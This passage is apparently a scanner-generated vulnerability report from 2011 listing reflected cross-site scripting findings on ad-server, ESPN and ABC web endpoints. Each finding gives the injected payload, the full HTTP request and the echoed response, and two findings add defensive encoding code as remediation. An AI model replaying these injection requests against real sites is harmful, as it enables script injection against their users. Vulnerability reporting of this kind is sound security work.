Cookie: dc=dc-sea; blue=1; dp2=1; apnx=1; rdst12=1; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; cli=11e4f07c0988ac7; nadp=1; rdst11=1; targ=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 26 Feb 2011 01:50:07 GMT
Content-Length: 7270
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("manta-12346973_1298685007","http://ad.doubleclick.net//manta.comp/energy_resources?5c2b1'-alert(1)-'8f009f52149=1;net=manta;u=,manta-12346973_1298685007,11e4f07c0988ac7,none,cm.rdst12-cm.rdst11-cm.polit_l;;contx=none;dc=w;btg=cm.rdst12;btg=cm.rdst11;btg=cm.polit_l?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.19. http://a.collective-media.net/cmadj/manta.comp/energy_resources [pos parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/manta.comp/energy_resources

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc135'-alert(1)-'315ca7472f3 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/manta.comp/energy_resources;pos=cc135'-alert(1)-'315ca7472f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.manta.com/c/mtl07lp/industrial-waste-recovery-llc
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11e4f07c0988ac7; JY57=3dY1_FHES3TRHCZNmOsvTJNeUatqJcvX7Nq1uKJSzEoZ2NeTOgc4cAw; targ=1; rdst11=1; rdst12=1; dp2=1; dc=dc-sea

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:19:22 GMT
Connection: close
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Sat, 05-Mar-2011 00:19:22 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 26-Feb-2011 08:19:22 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 00:19:22 GMT
Content-Length: 7790

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
createAndAttachAd("manta-14301451_1298679562","http://ad.doubleclick.net/adj/manta.comp/energy_resources;net=manta;u=,manta-14301451_1298679562,11e4f07c0988ac7,none,cm.rdst12-cm.rdst11-cm.polit_l;;pos=cc135'-alert(1)-'315ca7472f3;contx=none;dc=w;btg=cm.rdst12;btg=cm.rdst11;btg=cm.polit_l?","0","0",false);</scr'+'ipt>
...[SNIP]...

3.20. http://a.espncdn.com/combiner/c [css parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.espncdn.com
Path:   /combiner/c

Issue detail

The value of the css request parameter is reflected unmodified inside a /** ERROR: ... **/ comment in the response body. The payload ddc15<script>alert(1)</script>ddb75005989 was submitted in the css parameter. Note that the response is served with Content-Type: text/css rather than text/html and carries no X-Content-Type-Options header, so the injected <script> element is only interpreted by a browser that disregards the declared type; the severity assigned by the scanner assumes the reflection is rendered as HTML.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /combiner/c?css=photo.galleries.r3.cssddc15<script>alert(1)</script>ddb75005989 HTTP/1.1
Host: a.espncdn.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Wed, 23 Feb 2011 21:42:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW04
Cache-Expires: Sun, 24 Apr 2011 21:42:44 GMT
Vary: Accept-Encoding
Cache-Control: max-age=5184000
Date: Wed, 23 Feb 2011 21:42:43 GMT
Connection: close
Content-Length: 245


/** ERROR: photo.galleries.r3.cssddc15<script>alert(1)</script>ddb75005989: Server returned HTTP response code: 400 for URL: http://espnsource01c.starwave.com:9081/prod/styles/photo.galleries.r3.cssddc15<script>
...[SNIP]...

3.21. http://a.espncdn.com/combiner/c [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.espncdn.com
Path:   /combiner/c

Issue detail

The value of the js request parameter is reflected unmodified inside a /** ERROR: ... **/ comment appended to the concatenated script. The payload ab3e3<script>alert(1)</script>86514540ca5 was submitted in the js parameter. The response is served as application/x-javascript, in which a <script> tag is inert text; executing this payload requires a browser that renders the file as HTML. A payload that closes the comment and injects a statement, as in 3.23, works in the script context the combiner actually serves.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /combiner/c?js=analytics/sOmni.js,analytics/analytics.js,analytics/zf.js,analytics/externalnielsen.jsab3e3<script>alert(1)</script>86514540ca5&xhr=1 HTTP/1.1
Host: a.espncdn.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 23 Feb 2011 21:43:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW05
Cache-Expires: Sun, 24 Apr 2011 21:43:19 GMT
Vary: Accept-Encoding
Cache-Control: max-age=5184000
Date: Wed, 23 Feb 2011 21:43:17 GMT
Connection: close
Content-Length: 53472

if(typeof (s_account)!="undefined"&&s_account!=""){if(s_account=="wdgespuk"||s_account=="wdgespstar"||s_account=="wdgesp360europe"||s_account=="wdgesp360prodigymexico"||s_account=="wdgesp360terrabrazi
...[SNIP]...
<img src='"+A+"' style='display:none' />");});}
/** ERROR: analytics/externalnielsen.jsab3e3<script>alert(1)</script>86514540ca5: Server returned HTTP response code: 400 for URL: http://espnsource01c.starwave.com:9081/prod/scripts/analytics/externalnielsen.jsab3e3<script>
...[SNIP]...

3.22. http://a.espncdn.com/combiner/c/201012011221 [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.espncdn.com
Path:   /combiner/c/201012011221

Issue detail

The value of the js request parameter is reflected unmodified inside a /** ERROR: ... **/ comment in the response body. The payload c8e3d<script>alert(1)</script>23f304513d3 was submitted in the js parameter. As in 3.21, the response is application/x-javascript, so the <script> tag is only meaningful if the browser treats the file as HTML; 3.23 shows the comment-breakout form for the same parameter.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /combiner/c/201012011221?js=c8e3d<script>alert(1)</script>23f304513d3&development=true HTTP/1.1
Host: a.espncdn.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 23 Feb 2011 21:43:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW01
Cache-Expires: Sun, 24 Apr 2011 21:43:15 GMT
Vary: Accept-Encoding
Cache-Control: max-age=5184000
Date: Wed, 23 Feb 2011 21:43:14 GMT
Connection: close
Content-Length: 201


/** ERROR: c8e3d<script>alert(1)</script>23f304513d3: Server returned HTTP response code: 400 for URL: http://espnsource01c.starwave.com:9081/dev/scripts/c8e3d<script>alert(1)</script>23f304513d3 **/
...[SNIP]...

3.23. http://a.espncdn.com/combiner/c/201012011221 [js parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.espncdn.com
Path:   /combiner/c/201012011221

Issue detail

The value of the js request parameter is copied into a JavaScript inline comment. The payload d6911*/alert(1)//17464b787b5 was submitted in the js parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /combiner/c/201012011221?js=jquery-1.4.2.1.js,plugins/json2.r3.js,plugins/teacrypt.js,plugins/jquery.metadata.js,plugins/jquery.bgiframe.js,plugins/jquery.easing.1.3.js,plugins/jquery.hoverIntent.js,plugins/jquery.jcarousel.js,plugins/jquery.tinysort.r3.js,plugins/jquery.pubsub.r5.js,ui/1.8.2/jquery.ui.core.js,ui/1.8.2/jquery.ui.widget.js,ui/1.8.2/jquery.ui.tabs.js,ui/1.8.2/jquery.ui.accordion.js,plugins/ba-debug-0.4.js,espn.l10n.r8.js,swfobject/2.2/swfobject.js,flashObjWrapper.r7.js,plugins/jquery.colorbox.1.3.14.js,plugins/jquery.ba-postmessage.js,espn.core.duo.r49.js,espn.mem.r15.js,espn.mem.r16.js,stub.search.r3.js,espn.nav.mega.r30.js,espn.storage.r6.js,espn.p13n.r9.js,espn.video.r33a.js,registration/staticLogin.r10-14.js,espn.universal.overlay.r1.1.js,espn.insider.r5.js,espn.espn360.stub.r9.js,espn.myHeadlines.stub.r12.js,espn.myfaves.stub.r3.js,espn.scoreboard.r6.js,espn.partner.videobox.r3.js,%2Fforesee_v3%2Fforesee-alive.jsd6911*/alert(1)//17464b787b5&development=true HTTP/1.1
Host: a.espncdn.com
Proxy-Connection: keep-alive
Referer: http://espn.go.com/new-york/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 23 Feb 2011 21:43:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: EGW04
Cache-Expires: Sun, 24 Apr 2011 21:43:17 GMT
Vary: Accept-Encoding
Cache-Control: max-age=5183999
Date: Wed, 23 Feb 2011 21:43:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 327815

/*
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
B.length;D++){var H=B[D].split("=");if(!H||H.length!=2){continue;}var C=unescape(H[0]);var G=unescape(H[1]);G=G.replace(/\+/g," ");F[C]=G;}return F;};})(jQuery);
/** ERROR: /foresee_v3/foresee-alive.jsd6911*/alert(1)//17464b787b5: http://espnsource01c.starwave.com:9081/dev/scripts/foresee_v3/foresee-alive.jsd6911*/alert(1)//17464b787b5 **/

3.24. http://abc.go.com/watch [aa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the aa request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27e7b"-alert(1)-"850c9a5da4a was submitted in the aa parameter. This input was echoed unmodified in the application's response: the first quotation mark closes the string literal, the subtraction operators splice alert(1) into a syntactically valid expression, and the second quotation mark reopens a string so that the surrounding crumbs.set(...) statement still parses.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
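
Where the value cannot be kept out of the script block, the correct encoding is a JSON-style string literal with the few characters JSON leaves alone additionally escaped. The following is an added example, not the site's code, serving both the breadcrumb snippet of finding 3.24 (and the other double-quoted-string findings on /watch) and the combiner error marker of finding 3.23; the builder and check function names are illustrative.

```javascript
// Added example (not the site's code): emit attacker-influenced data into a
// <script> block safely. Function names are illustrative.

// Vulnerable shape, as seen in the /watch responses: raw concatenation into a
// double-quoted JavaScript string literal.
function breadcrumbUnsafe(currentPageUrl) {
  return '<script>crumbs.set({"currentPageUrl":"' + currentPageUrl + '"});</script>';
}

// JSON-encode, then escape what JSON does not: '<' and '>' so "</script>"
// can never end the element, '&' for good measure, and the U+2028/U+2029
// line terminators that older JS engines reject inside string literals.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function breadcrumbSafe(currentPageUrl) {
  return '<script>crumbs.set({"currentPageUrl":' + jsStringLiteral(currentPageUrl) + '});</script>';
}

// A comment has no escape syntax: "*/" always ends it. Instead of writing the
// missing file name into /** ... **/, report it from a string literal.
function missingScriptMarker(requestedPath) {
  return 'console.error("combiner: missing script", ' + jsStringLiteral(requestedPath) + ');';
}

// Verification: the hardened literal, compiled on its own, must evaluate to
// exactly the input with nothing else executed.
function roundTrips(value) {
  const literal = jsStringLiteral(value);
  return new Function('return ' + literal + ';')() === String(value);
}

// Does an emitted snippet still contain the raw break-out sequence?
function leaksBreakout(snippet, sequence) {
  return snippet.includes(sequence);
}

const PAYLOAD_STRING = '27e7b"-alert(1)-"850c9a5da4a';                  // from 3.24
const PAYLOAD_COMMENT = 'foresee-alive.jsd6911*/alert(1)//17464b787b5';  // from 3.23
```

roundTrips() compiles only the hardened literal; the unsafe builder is never handed to new Function, because with the payload above it would be executed as three expressions rather than one string. Any framework's JSON serializer with an HTML-safe option produces the same result as jsStringLiteral.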

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F27e7b"-alert(1)-"850c9a5da4a&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:25 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:25 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F27e7b"-alert(1)-"850c9a5da4a&partner=&pc=&pl=&brandid=001","cookieName" : "abc_vp_breadcrumb" });
</script>
...[SNIP]...

3.25. http://abc.go.com/watch [aa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the aa request parameter is copied into an HTML comment. The payload 992fa--><script>alert(1)</script>cc4d89a2688 was submitted in the aa parameter. This input was echoed unmodified in the application's response: the --> terminates the debug comment early and the script element that follows is parsed and executed as ordinary markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
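
The comment in question is the "~#~#VP2#~#~" debug line that echoes the whole request URL (findings 3.25, 3.26, 3.28, 3.31, 3.32, 3.34, 3.37 and 3.38). The best fix is to drop that comment from production output, which also stops it disclosing the VP2 version string. If it must stay, the echoed text has to be made incapable of closing or nesting a comment. The following is an added example, not the site's code, with illustrative function names:

```javascript
// Added example (not the site's code): hardening text emitted inside an HTML
// comment, beside the unsafe shape seen in the /watch responses.

function debugCommentUnsafe(requestUrl) {
  return '<!-- ~#~#VP2#~#~ ' + requestUrl + ' -->';
}

// Entity-encode the characters that can form "-->", "--!>" or "<!--", and
// split every "--". Entities are not decoded inside comments, so the result
// is inert there. The page declares an XHTML 1.0 doctype, where a bare "--"
// inside a comment is a well-formedness error in its own right.
function htmlCommentText(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/--/g, '-&#45;');
}

function debugCommentSafe(requestUrl) {
  return '<!-- ~#~#VP2#~#~ ' + htmlCommentText(requestUrl) + ' -->';
}

// True when the only terminator is the template's own and the body can
// neither open a nested comment nor start with a forbidden ">" or "->".
function commentIntact(comment) {
  if (!comment.startsWith('<!--') || !comment.endsWith('-->')) return false;
  const body = comment.slice(4, -3);
  return !body.includes('-->') && !body.includes('--!>') &&
    !body.includes('<!--') && !/^(>|->)/.test(body);
}

const PAYLOAD = '992fa--><script>alert(1)</script>cc4d89a2688'; // from 3.25
```

commentIntact() is a string-level check that mirrors the HTML parsing rules for comment text; run it against the rendered comment in a template unit test so a regression in the encoder is caught before a scanner does.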

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F992fa--><script>alert(1)</script>cc4d89a2688&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:27 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:27 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F992fa--><script>alert(1)</script>cc4d89a2688&partner=&pc=&pl=&brandid=001 -->
...[SNIP]...

3.26. http://abc.go.com/watch [aff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the aff request parameter is copied into an HTML comment. The payload b4702--><script>alert(1)</script>cf5748d6729 was submitted in the aff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komob4702--><script>alert(1)</script>cf5748d6729&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:17 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc04
X-Powered-By: ASP.NET
Cache-Expires: Wed, 23 Feb 2011 23:12:17 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.9_10_1 ~~~ Brandid: 001 ~~~ /watch?i=1&aff=komob4702--><script>alert(1)</script>cf5748d6729&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~R
...[SNIP]...

3.27. http://abc.go.com/watch [aff parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the aff request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3315a"-alert(1)-"b50500fdfde was submitted in the aff parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /watch?i=1&aff=komo3315a"-alert(1)-"b50500fdfde&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:15 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:15 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:15 GMT
Content-Length: 16360
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
>
   var crumbs = new abcdm.abc.vp2.ui.breadcrumb.Breadcrumb('breadcrumb');
   crumbs.set({"breadcrumbDiv": "breadcrumb", "showTitle": "","currentPageType":"Featured", "currentPageUrl":"/watch?i=1&aff=komo3315a"-alert(1)-"b50500fdfde&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~R
...[SNIP]...

3.28. http://abc.go.com/watch [al parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the al request parameter is copied into an HTML comment. The payload 62285--><script>alert(1)</script>0ee6960a174 was submitted in the al parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png62285--><script>alert(1)</script>0ee6960a174&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl= HTTP/1.1
Host: abc.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Wed, 23 Feb 2011 23:11:22 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Wed, 23 Feb 2011 23:11:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
Cache-Expires: Wed, 23 Feb 2011 23:12:22 GMT
Content-Length: 16408
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Watch Full Episodes
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 6.0.3.9_10_1 ~~~ Brandid: 001 ~~~ /watch?i=1&aff=komo&al=http%3A//ll.static.abc.com/m/fep/images/aff/komo/komo_wcvmp1.png62285--><script>alert(1)</script>0ee6960a174&aa=http%3A//ad.doubleclick.net/adx/abc.KOMO.episode/~SHOW~%3Bsz%3D10x10%3Bimp%3Dcreative%3B!category%3D~SPONSOR_CATEGORY~%3Bord%3D~RANDOM_NUMBER~%3F&partner=&pc=&pl=&brandid=001 -->
...[SNIP]...

3.29. http://abc.go.com/watch [al parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://abc.go.com
Path:   /watch

Issue detail

The value of the al request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload add94"-alert(1)-"da4ce7e27d2 was submitted in the al parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

